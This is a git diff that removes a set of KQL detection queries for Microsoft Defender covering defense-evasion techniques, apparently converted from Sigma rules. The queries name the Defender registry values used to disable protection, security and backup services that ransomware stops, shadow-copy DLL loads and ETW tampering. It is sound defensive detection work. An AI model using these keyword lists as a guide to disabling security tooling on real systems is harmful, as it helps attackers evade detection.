@@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel, Elastic (idea) -// Date: 2023/04/20 -// Level: medium -// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence -// Tags: attack.defense_evasion, attack.persistence, attack.t1036.005, attack.t1053.005 -DeviceProcessEvents -| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or ProcessIntegrityLevel =~ "System"))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Service_Binary_Directory.kql b/Defense Evasion/Suspicious_Service_Binary_Directory.kql deleted file mode 100644 index 684796f3..00000000 --- a/Defense Evasion/Suspicious_Service_Binary_Directory.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/09 -// Level: high -// Description: Detects a service binary running in a suspicious directory -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "C:\\Perflogs\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\addins\\") and (InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Service_Installed.kql b/Defense Evasion/Suspicious_Service_Installed.kql deleted file mode 100644 index 72b3dc93..00000000 --- a/Defense Evasion/Suspicious_Service_Installed.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: xknow (@xknow_infosec), xorxes (@xor_xes) -// Date: 2019/04/08 -// Level: medium -// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. -Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) - -// Tags: attack.t1562.001, attack.defense_evasion -DeviceRegistryEvents -| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Sigverif_Execution.kql b/Defense Evasion/Suspicious_Sigverif_Execution.kql deleted file mode 100644 index a4a4205f..00000000 --- a/Defense Evasion/Suspicious_Sigverif_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/19 -// Level: medium -// Description: Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\sigverif.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql b/Defense Evasion/Suspicious_Splwow64_Without_Params.kql deleted file mode 100644 index 819070d3..00000000 --- a/Defense Evasion/Suspicious_Splwow64_Without_Params.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/08/23 -// Level: high -// Description: Detects suspicious Splwow64.exe process without any command line parameters -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql b/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql deleted file mode 100644 index 620e4c12..00000000 --- a/Defense Evasion/Suspicious_Usage_Of_ShellExec_RunDLL.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/01 -// Level: high -// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "comspec") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Userinit_Child_Process.kql b/Defense Evasion/Suspicious_Userinit_Child_Process.kql deleted file mode 100644 index c667ab72..00000000 --- a/Defense Evasion/Suspicious_Userinit_Child_Process.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea) -// Date: 2019/06/17 -// Level: medium -// Description: Detects a suspicious child process of userinit -// Tags: attack.defense_evasion, attack.t1055 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not((ProcessCommandLine contains "\\netlogon\\" or (FolderPath endswith "\\explorer.exe" or ProcessVersionInfoOriginalFileName =~ "explorer.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql b/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql deleted file mode 100644 index b314305f..00000000 --- a/Defense Evasion/Suspicious_VBoxDrvInst.exe_Parameters.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020/10/06 -// Level: medium -// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. -This allows to create values in the registry and install drivers. -For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys - -// Tags: attack.defense_evasion, attack.t1112 -DeviceProcessEvents -| where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql deleted file mode 100644 index 714a3039..00000000 --- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_VSS_PS.dll_Load.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Markus Neis, @markus_neis -// Date: 2021/07/07 -// Level: high -// Description: Detects the image load of vss_ps.dll by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql deleted file mode 100644 index 76697076..00000000 
--- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vssapi.dll_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/10/31 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vssapi.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\" or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql b/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql deleted file mode 100644 index ddc53c62..00000000 --- a/Defense Evasion/Suspicious_Volume_Shadow_Copy_Vsstrace.dll_Load.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/02/17 -// Level: high -// Description: Detects the image load of VSS DLL by uncommon executables -// Tags: attack.defense_evasion, attack.impact, attack.t1490 -DeviceImageLoadEvents -| where FolderPath endswith "\\vsstrace.dll" and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql b/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql deleted file mode 100644 index e272b115..00000000 --- a/Defense Evasion/Suspicious_Vsls-Agent_Command_With_AgentExtensionPath_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: bohops -// Date: 2022/10/30 -// Level: medium -// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent.")) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql deleted file mode 100644 index bf07a61d..00000000 --- a/Defense Evasion/Suspicious_WMIC_Execution_Via_Office_Process.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Vadim Khrykov, Cyb3rEng -// Date: 2021/08/23 -// Level: high -// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). -// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql deleted file mode 100644 index 633e76dc..00000000 --- a/Defense Evasion/Suspicious_Windows_Defender_Folder_Exclusion_Added_Via_Reg.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/02/13 -// Level: medium -// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql b/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql deleted file mode 100644 index 1e1cc728..00000000 --- a/Defense Evasion/Suspicious_Windows_Defender_Registry_Key_Tampering_Via_Reg.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/03/22 -// Level: high -// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or 
ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql b/Defense Evasion/Suspicious_Windows_Service_Tampering.kql deleted file mode 100644 index 39f2a2c4..00000000 --- a/Defense Evasion/Suspicious_Windows_Service_Tampering.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022/09/01 -// Level: high -// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts -// Tags: attack.defense_evasion, attack.t1489 -DeviceProcessEvents -| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or 
ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains 
"mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "sense" or ProcessCommandLine contains 
"SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "Veeam" or 
ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " stop " and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe"))) or ((ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) or ((ProcessCommandLine contains " stop " or ProcessCommandLine contains " delete " or ProcessCommandLine contains " pause ") and (ProcessVersionInfoOriginalFileName =~ "sc.exe" or FolderPath endswith "\\sc.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql b/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql deleted file mode 100644 index 3a8d740e..00000000 --- a/Defense Evasion/Suspicious_Windows_Trace_ETW_Session_Tamper_Via_Logman.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/11
-// Level: high
-// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions
-// Tags: attack.defense_evasion, attack.t1562.001, attack.t1070.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql b/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql
deleted file mode 100644
index 1d0f27c0..00000000
--- a/Defense Evasion/Suspicious_Windows_Update_Agent_Empty_Cmdline.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/26
-// Level: high
-// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql b/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql
deleted file mode 100644
index dbebbd92..00000000
--- a/Defense Evasion/Suspicious_WmiPrvSE_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects suspicious and uncommon child processes of WmiPrvSE
-// Tags: attack.execution, attack.defense_evasion, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
